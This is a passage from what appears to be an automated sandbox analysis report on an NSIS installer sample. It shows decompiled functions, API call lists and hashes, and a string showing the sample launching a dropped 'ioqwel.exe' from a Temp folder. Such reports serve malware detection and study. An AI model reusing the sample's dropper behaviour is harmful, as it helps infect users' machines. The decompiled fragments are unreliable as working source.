				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040534F(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB");
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Strings

GB, xrefs: 00402112

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: GB
API String ID: 2987980305-3285937634
Opcode ID: f6d6a6ee35adb547828d4ce43f756b76f7f39e1cf1e9ea6ef2c6164503e1a030
Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
Opcode Fuzzy Hash: f6d6a6ee35adb547828d4ce43f756b76f7f39e1cf1e9ea6ef2c6164503e1a030
Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406631(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction ID: 3131e3f6e31e27b0aa66d3651422ecf58d36830b066a5e7c74bd8b9791dc988a
Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction Fuzzy Hash: 21215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48F64AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
Instruction ID: 488f83a01e3392fad3bf683b4443aaeb9baaf514c425c8ec37ca45fc88de17ea
Opcode Fuzzy Hash: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
Instruction Fuzzy Hash: E9212A72E00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00406186();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
Instruction ID: 5097186ed897f0bb8f2c49de76e9dd96fe00b68d7cb2a8ba7479d5b6a1f75869
Opcode Fuzzy Hash: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
Instruction Fuzzy Hash: 18014072504344AEE7017BA4AE89B9A7FF8E755701F10547AF141B61F2CB790445CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
Instruction ID: 90c6e89302a946556e44a8134fdeeaca46b2157ebe1368c161caa9607488c25b
Opcode Fuzzy Hash: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
Instruction Fuzzy Hash: 80216071A44208BEEB05DFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BC0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405bc1
0x00405bd8
0x00405be0
0x00405be0
0x00405be8

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BCF
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: d6a8f4146c737b4c1111608fba26ea94f920a63204c4a5504a78fba285be9fad
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 2CD0A7721055307BD21237154C09ECF2A488F0230470A006BF541B6191C73C5C1187FE

Uniqueness

Uniqueness Score: -1.00%

Function 004052C3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
							_push(_t16);
							_push(6);
							 *0x420d3c = _t16;
							E00404C7F();
						}
						L11:
						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BFF(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004042F8(0x413);
				return 0;
			}

0x004052c7
0x004052d1
0x004052ed
0x0040530f
0x00405312
0x00405318
0x00405322
0x00405323
0x00405325
0x0040532b
0x0040532b
0x00405335
0x00000000
0x00405343
0x004052fa
0x00405332
0x00405332
0x00000000
0x00405332
0x00405306
0x00405308
0x00000000
0x00405308
0x004052d7
0x00000000
0x00000000
0x004052de
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 004052F2
CallWindowProcA.USER32 ref: 00405343

Part of subcall function 004042F8: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040430A

Strings

, xrefs: 004052D3

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405CAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405CAE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406228(0x422158, _a4);
				_t21 = E00405C59(0x422158);
				if(_t21 != 0) {
					E00406503(_t21);
					if(( *0x42475c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422158;
						while(1) {
							_t11 = lstrlenA(0x422158);
							_push(0x422158);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040659C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C07(0x422158);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC0();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405cba
0x00405cc5
0x00405cc9
0x00405cd0
0x00405cdc
0x00405ce8
0x00405ce8
0x00405d00
0x00405d01
0x00405d08
0x00405d09
0x00000000
0x00000000
0x00405cec
0x00405cf3
0x00405cfb
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cf3
0x00405d0b
0x00000000
0x00405d1f
0x00405cde
0x00405ce2
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ce2
0x00405ccb
0x00000000

APIs

Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235

Part of subcall function 00405C59: CharNextA.USER32(?,?,00422158,?,00405CC5,00422158,00422158,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560,00000000), ref: 00405C67
Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80

lstrlenA.KERNEL32(00422158,00000000,00422158,00422158,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560,00000000), ref: 00405D01
GetFileAttributesA.KERNEL32(00422158,00422158,00422158,00422158,00422158,00422158,00000000,00422158,00422158,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560), ref: 00405D11

Strings

X!B, xrefs: 00405CB4

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: X!B
API String ID: 3248276644-2309198661
Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040610F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040611d
0x0040611f
0x00406137
0x0040613c
0x00406141
0x0040617e
0x0040617e
0x00406143
0x00406155
0x00406160
0x00406166
0x00406170
0x00000000
0x00000000
0x00406170
0x00406183

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,00420530,?,?,?,00000002,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,?,004063C4,80000002), ref: 00406155
RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,?,00420530), ref: 00406160

Strings

C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s, xrefs: 00406112, 00406146

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
